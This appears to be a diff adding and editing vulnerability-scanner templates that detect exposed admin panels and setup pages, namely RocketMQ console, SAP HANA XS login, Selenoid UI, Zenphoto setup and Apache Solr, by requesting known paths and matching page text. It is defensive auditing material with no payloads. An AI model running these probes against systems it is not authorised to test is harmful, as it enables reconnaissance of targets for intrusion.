+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}'
+
+    matchers:
+      - type: word
+        words:
+          - "<title>RocketMq-console-ng</title>"

exposed-panels/sap-hana-xsengine-panel.yaml

@@ -9,7 +9,6 @@ requests:
   - method: GET
     path:
       - "{{BaseURL}}/sap/hana/xs/formLogin/login.html"
-      - "{{BaseURL}}:8000/sap/hana/xs/formLogin/login.html"
     redirects: true
     matchers:
       - type: word

exposed-panels/selenoid-ui-exposure.yaml

@@ -0,0 +1,17 @@
+id: selenoid-ui-exposure
+
+info:
+  name: Selenoid UI Dashboard Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/admin/login'
+    matchers:
+      - type: word
+        words:
+          - "<title>Selenoid UI</title>"
+          - "/manifest.json"
+        condition: and

exposed-panels/setup-page-exposure.yaml

@@ -0,0 +1,20 @@
+id: setup-page-exposure
+
+info:
+  name: Zenphoto Setup Page Exposure
+  author: pd-team
+  severity: medium
+  description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/zp-core/setup/index.php'
+      - '{{BaseURL}}/zp/zp-core/setup/index.php'
+      - '{{BaseURL}}/gallery/zp-core/setup/index.php'
+      - '{{BaseURL}}/zenphoto/zp-core/setup/index.php'
+    matchers:
+      - type: word
+        words:
+          - Welcome to Zenphoto! This page will set up Zenphoto
+        part: body

exposed-panels/solr-exposure.yaml

@@ -0,0 +1,15 @@
+id: solr-exposure
+
+info:
+  name: Apache Solr Exposure
+  author: pd-team
+  severity: medium
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/solr/'
+    matchers:
+      - type: word
+        words:
+          - "<title>Solr Admin</title>"